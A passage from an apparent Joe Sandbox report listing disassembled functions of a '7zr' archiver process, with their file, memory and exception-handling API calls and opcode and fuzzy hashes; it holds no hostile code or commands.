                                              • Opcode ID: d76be237c3bb4c501459623f289879d0e06fd163ce349eb2d3480f1a54aa5427
                                              • Instruction ID: 6517293031fb4e70a622519d0591f350e078bd5483f737894d3840dd6a8342e4
                                              • Opcode Fuzzy Hash: d76be237c3bb4c501459623f289879d0e06fd163ce349eb2d3480f1a54aa5427
                                              • Instruction Fuzzy Hash: D8F0F434914B54DBCB19FB68C4263ADBBE4EF00314F10465DE452632D2CBB46B049775
                                              Function 00D28565 Relevance: 1.5, APIs: 1, Instructions: 36COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                              • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: H_prolog
                                              • String ID:
                                              • API String ID: 3519838083-0
                                              • Opcode ID: ba7128bdb510e041b0274c3baf2a41de5ff8ddde47a3e17cddc7e07273b42514
                                              • Instruction ID: 41178882e49fd8a3ee80df322a7ebfc77ef4912979e803df5e81a52af3be6327
                                              • Opcode Fuzzy Hash: ba7128bdb510e041b0274c3baf2a41de5ff8ddde47a3e17cddc7e07273b42514
                                              • Instruction Fuzzy Hash: 7EF0AF32E1102AABCB00EF98D8509AFBB75FF54750B00805AF415E7251CB348A05DBA0
                                              Function 00D35505 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                              Download Yara Rule
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 00D3550A
                                                • Part of subcall function 00D34E8A: __EH_prolog.LIBCMT ref: 00D34E8F
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                              • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: H_prolog
                                              • String ID:
                                              • API String ID: 3519838083-0
                                              • Opcode ID: 6142241083ecb0592c8970b82e6b9b152e3d7036045300889022273061631659
                                              • Instruction ID: e810003a7ba97041a9ac9391983e7310cfb9eb65925704077925bed981884c68
                                              • Opcode Fuzzy Hash: 6142241083ecb0592c8970b82e6b9b152e3d7036045300889022273061631659
                                              • Instruction Fuzzy Hash: 49F06D76600914EBCB019F48E811B9EBBBAFF85760F10442AF411A7201DB75ED009BB0
                                              Function 00D19987 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                              • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: H_prolog
                                              • String ID:
                                              • API String ID: 3519838083-0
                                              • Opcode ID: e43ecd869952e8496fbc797d14a516e410ba48513ce3b739c52ba8b91003ab4f
                                              • Instruction ID: 45d8a1dc526214ce9ea041b5b7c798f6910400e34e61c779d9e74e2484f408b7
                                              • Opcode Fuzzy Hash: e43ecd869952e8496fbc797d14a516e410ba48513ce3b739c52ba8b91003ab4f
                                              • Instruction Fuzzy Hash: F5E0ED75610104AFC714EF98D855F9EBBA8FF49354F10845AB44A97241C775E940CB74
                                              Function 00D35E2B Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                              Download Yara Rule
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 00D35E30
                                                • Part of subcall function 00D308B6: __aulldiv.LIBCMT ref: 00D3093F
                                                • Part of subcall function 00D0DFC9: __EH_prolog.LIBCMT ref: 00D0DFCE
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                              • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: H_prolog$__aulldiv
                                              • String ID:
                                              • API String ID: 604474441-0
                                              • Opcode ID: 8401f3b3db6bbf0e4d10cff3e2d7355d7327f2818ecbf2375ee257cafba7ea90
                                              • Instruction ID: 90e1ad9016f4beb2f01cd45792de15c9f1ccef6d94528a8524d4c135a158cc28
                                              • Opcode Fuzzy Hash: 8401f3b3db6bbf0e4d10cff3e2d7355d7327f2818ecbf2375ee257cafba7ea90
                                              • Instruction Fuzzy Hash: 04E0C971A11754DFCB55EFA8955169EBAE4FF08700F00596FA046D3B41DAB4A9008BA0
                                              Function 00D38ED1 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                              Download Yara Rule
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 00D38ED6
                                                • Part of subcall function 00D39267: __EH_prolog.LIBCMT ref: 00D3926C
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                              • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: H_prolog
                                              • String ID:
                                              • API String ID: 3519838083-0
                                              • Opcode ID: 33d0c1b576aa598f0cea5d8b16936ba503c0aac1c6ee2d8065df97ce3f0d5ca0
                                              • Instruction ID: 11dc515ff276b1349d15768a881bdbd19c263465e9df9996cd3ff6d33cacbe8e
                                              • Opcode Fuzzy Hash: 33d0c1b576aa598f0cea5d8b16936ba503c0aac1c6ee2d8065df97ce3f0d5ca0
                                              • Instruction Fuzzy Hash: ACE092719209209ACB09EB64E522BDDF7A8EF05704F40065DA04392682CBF46604C7B5
                                              Function 00CF7C68 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 00CF7C8B
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                              • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: FileWrite
                                              • String ID:
                                              • API String ID: 3934441357-0
                                              • Opcode ID: 0b93320f1c2850d07e9eb679e64fce334c2b6072906dae90f0da2ee40438cf7e
                                              • Instruction ID: 5443889e57178400c721de8d662a3a9c3108aace7a25b2befb7039e2d4f7e680
                                              • Opcode Fuzzy Hash: 0b93320f1c2850d07e9eb679e64fce334c2b6072906dae90f0da2ee40438cf7e
                                              • Instruction Fuzzy Hash: 20E01A75600309FBCF11CFA5D801B8E7BB9EB09754F20C16AF919AA260D73ADA50DF54
                                              Function 00D3BE69 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                              Download Yara Rule
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 00D3BE6E
                                                • Part of subcall function 00D35E2B: __EH_prolog.LIBCMT ref: 00D35E30
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                              • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: H_prolog
                                              • String ID:
                                              • API String ID: 3519838083-0
                                              • Opcode ID: 15570f66e65106924c7c8232f430acd594eb85b94fe47d78d55852bf54cc8593
                                              • Instruction ID: 21db611a3e4981ba22c3c9b99710b6710d9e4652397f7b8d4fbfd17759c21f70
                                              • Opcode Fuzzy Hash: 15570f66e65106924c7c8232f430acd594eb85b94fe47d78d55852bf54cc8593
                                              • Instruction Fuzzy Hash: 65E09271A24A608BD715FB24C011BDDB7A8FB00704F00845EE096D32C2CFB46A04C7B1
                                              Function 00CF2201 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                              • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: fputs
                                              • String ID:
                                              • API String ID: 1795875747-0
                                              • Opcode ID: 7d20ee1a074b87442135979c326f58e771d94d8dda812d638c1080938d23eeb5
                                              • Instruction ID: b51c10a0bc2a547952934a5a3206eff6d104eeef987df2a3c736ce8bd6c5e09f
                                              • Opcode Fuzzy Hash: 7d20ee1a074b87442135979c326f58e771d94d8dda812d638c1080938d23eeb5
                                              • Instruction Fuzzy Hash: 61D0123250421DABCF156B94DC05CDD77BCEF08254704441BF945F2190EA75E51497A4
                                              Function 00D2F745 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                              Download Yara Rule
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 00D2F74A
                                                • Part of subcall function 00D2F784: __EH_prolog.LIBCMT ref: 00D2F789
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                              • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: H_prolog
                                              • String ID:
                                              • API String ID: 3519838083-0
                                              • Opcode ID: 9d2c24f13af520f5833834237cbdeee437ce90fc2a6b73dec19de1c29f7437fe
                                              • Instruction ID: 6849778dbb73a5880638879880205eebcd4bdec3b7277cd20dc27ff6f859b05e
                                              • Opcode Fuzzy Hash: 9d2c24f13af520f5833834237cbdeee437ce90fc2a6b73dec19de1c29f7437fe
                                              • Instruction Fuzzy Hash: B7D01271A10214BFDB149F45D912BAEB778EB40759F10093EF00162241C3B5590086B4
                                              Function 00CF7B4F Relevance: 1.5, APIs: 1, Instructions: 18fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • ReadFile.KERNELBASE(00000002,?,?,00000000,00000000,00000002,?,00CF785F,00000000,00004000,00000000,00000002,?,?,?), ref: 00CF7B65
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                              • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: FileRead
                                              • String ID:
                                              • API String ID: 2738559852-0
                                              • Opcode ID: f0dae4ffa187a8aaa3dd1fc6b7c67aa63beda97bc671e08cd371217da491a8b7
                                              • Instruction ID: 16fcb47d266b00fffc5d06cf179b109aba7e63df816bd30a0bebcd29cd349a32
                                              • Opcode Fuzzy Hash: f0dae4ffa187a8aaa3dd1fc6b7c67aa63beda97bc671e08cd371217da491a8b7
                                              • Instruction Fuzzy Hash: 53E0EC75200308FBDF01CF90CD01F8E7BB9AB49758F208059E905A6260C375AA54EB54
                                              Function 00D480AA Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                                              Download Yara Rule
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 00D480AF
                                                • Part of subcall function 00CF1E0C: malloc.MSVCRT ref: 00CF1E1F
                                                • Part of subcall function 00CF1E0C: _CxxThrowException.MSVCRT(?,00DA4B28), ref: 00CF1E39
                                                • Part of subcall function 00D3BDB5: __EH_prolog.LIBCMT ref: 00D3BDBA
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                              • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: H_prolog$ExceptionThrowmalloc
                                              • String ID:
                                              • API String ID: 3744649731-0
                                              • Opcode ID: 225205a8399456a33b7e652ce0935745ba909ba939881ad86aefce1303a68c60
                                              • Instruction ID: c94ea07aa3783e66bfa4126fdc5177ba2a64e7f7a2768d23d46a1f5361e4bcb1
                                              • Opcode Fuzzy Hash: 225205a8399456a33b7e652ce0935745ba909ba939881ad86aefce1303a68c60
                                              • Instruction Fuzzy Hash: 18D05E71B01105AFCF48FFB8A42676EB2E0EB44340F00457EB416E3781EF7499008A35
                                              Function 00CF6848 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                              Download Yara Rule
                                              APIs
                                              • FindClose.KERNELBASE(00000000,?,00CF6880), ref: 00CF6853
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                              • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: CloseFind
                                              • String ID:
                                              • API String ID: 1863332320-0
                                              • Opcode ID: ba632cf868879996cc6c47c733a24789ba7f5a7e91a4a00247635e7a7f27ade0
                                              • Instruction ID: dfba3fa5565f1063951d27fc06fcf1f2d11acbcf4c04f7cf151cdd257f9db504
                                              • Opcode Fuzzy Hash: ba632cf868879996cc6c47c733a24789ba7f5a7e91a4a00247635e7a7f27ade0
                                              • Instruction Fuzzy Hash: 34D01231114321468AA45E3D78449E537E86E06374321175EF0B0D31E5D7618C835750
                                              Function 00CF2010 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                              • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: fputs
                                              • String ID:
                                              • API String ID: 1795875747-0
                                              • Opcode ID: cdbef1adc4baaec67571bcc1d5b3de45aa417e180061fe50b9178306a230e582
                                              • Instruction ID: 2ab06e006f711820fe5cedc49b6a815694b98c674fa4580367c35b8e5d69820b
                                              • Opcode Fuzzy Hash: cdbef1adc4baaec67571bcc1d5b3de45aa417e180061fe50b9178306a230e582
                                              • Instruction Fuzzy Hash: 8DD0C937008351AF96656F05EC09C8BBBA5FFD5320721082FF484921609B626C25DAB5
                                              Function 00CF1FA0 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                              • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: fputc
                                              • String ID:
                                              • API String ID: 1992160199-0
                                              • Opcode ID: 19ffb2fca236398543e697e3d7aa8a108d0e09cf6f29d27e799c29b8809fc2b8
                                              • Instruction ID: 0731f5a34e28564123f181f5975aa5f1f1f80aeabcb3ecbc55a2e3f4982656cf
                                              • Opcode Fuzzy Hash: 19ffb2fca236398543e697e3d7aa8a108d0e09cf6f29d27e799c29b8809fc2b8
                                              • Instruction Fuzzy Hash: 5AB092323183209BE6181A9CBC0AAC06794DB09732B21005BF544D22909A911C814AA9
                                              Function 00CF7C3B Relevance: 1.5, APIs: 1, Instructions: 9timeCOMMON
                                              Download Yara Rule
                                              APIs
                                              • SetFileTime.KERNELBASE(?,?,?,?,00CF7C65,00000000,00000000,?,00CFF238,?,?,?,?), ref: 00CF7C49
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                              • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: FileTime
                                              • String ID:
                                              • API String ID: 1425588814-0
                                              • Opcode ID: 0bd78cdec77190d6e9d585649262f5bb3940910fbb4fcd9c3345e27e33cf99fb
                                              • Instruction ID: 7f3672028b83d603b78eb4600e7a9a7606dd48e218f1843f16c320937e2af0f3
                                              • Opcode Fuzzy Hash: 0bd78cdec77190d6e9d585649262f5bb3940910fbb4fcd9c3345e27e33cf99fb
                                              • Instruction Fuzzy Hash: B8C04C36158205FF8F024F70CC04C1ABBA2ABA5711F10D919F159C4070C7328024EB16
                                              Function 00CF7D3C Relevance: 1.5, APIs: 1, Instructions: 6fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • SetEndOfFile.KERNELBASE(?,00CF7D81,?,?,?), ref: 00CF7D3E
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                              • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: File
                                              • String ID:
                                              • API String ID: 749574446-0
                                              • Opcode ID: 75ed7b0cf8fc14aa221e2e1ba6de6c63cf690f6cae30e9f70e96840d2e478750
                                              • Instruction ID: dbb40b7cd96769e8b05991f337a52771a32639f7f41d192656bc05cba7fdaf8d
                                              • Opcode Fuzzy Hash: 75ed7b0cf8fc14aa221e2e1ba6de6c63cf690f6cae30e9f70e96840d2e478750
                                              • Instruction Fuzzy Hash: 5DA001702A521A8A8E111B34D8098243AA1AA626067A026A5A002DA5B5DA224419AA15
                                              Function 00CFC4D6 Relevance: 1.5, APIs: 1, Instructions: 205COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                              • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: memmove
                                              • String ID:
                                              • API String ID: 2162964266-0
                                              • Opcode ID: ac17aab8945d6b9877f12b2dd54a75510d996226f791319ae36cbf50029ec160
                                              • Instruction ID: a4849fb15a13d3919c8e309f842d8489ace08df349ccee0b872385c69efbabf3
                                              • Opcode Fuzzy Hash: ac17aab8945d6b9877f12b2dd54a75510d996226f791319ae36cbf50029ec160
                                              • Instruction Fuzzy Hash: 57813F71E0424D9FCF54CFA8C6C46FEBBB1AF48304F14846AE621A7241D775AA85CF62
                                              Function 00D03E04 Relevance: 1.3, APIs: 1, Instructions: 17COMMON
                                              Download Yara Rule
                                              APIs
                                              • CloseHandle.KERNELBASE(00000000,00000000,00D03D8D,?,00000000,?,?,00000000,00000000,759A8E30), ref: 00D03E12
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                              • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: CloseHandle
                                              • String ID:
                                              • API String ID: 2962429428-0
                                              • Opcode ID: 0ce61254dedab705ca18cebefcb1f818b9e6c42d79a00cb889edb3b7be9e5662
                                              • Instruction ID: db02e1a486b157eeae1dc090d9d7c116283aa65d64c86cc9f1971a5090ef3a33
                                              • Opcode Fuzzy Hash: 0ce61254dedab705ca18cebefcb1f818b9e6c42d79a00cb889edb3b7be9e5662
                                              • Instruction Fuzzy Hash: 4AD0123151431147DB705E2DF8047D163DD6F10321B19465AF884DB290E764CCC25A64
                                              Function 00D76BC6 Relevance: 1.3, APIs: 1, Instructions: 16COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                              • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: malloc
                                              • String ID:
                                              • API String ID: 2803490479-0
                                              • Opcode ID: f6689b844a0abd90852679766297054ea5ad023363036feb97c819a96c7c6895
                                              • Instruction ID: 45b6a16d1b8fe8e9c35ced0c21566b374a35f98a86a2ed03d014a5809b594f66
                                              • Opcode Fuzzy Hash: f6689b844a0abd90852679766297054ea5ad023363036feb97c819a96c7c6895
                                              • Instruction Fuzzy Hash: 6ED022B0203A0102CF484A304C0AB2B30C4AF4130AF2CC8BEE81BCB681FB18C218C278
                                              Function 00CF764C Relevance: 1.3, APIs: 1, Instructions: 16COMMON
                                              Download Yara Rule
                                              APIs
                                              • CloseHandle.KERNELBASE(00000000,?,00CF75AF,00000002,?,00000000,00000000), ref: 00CF7657
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                              • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
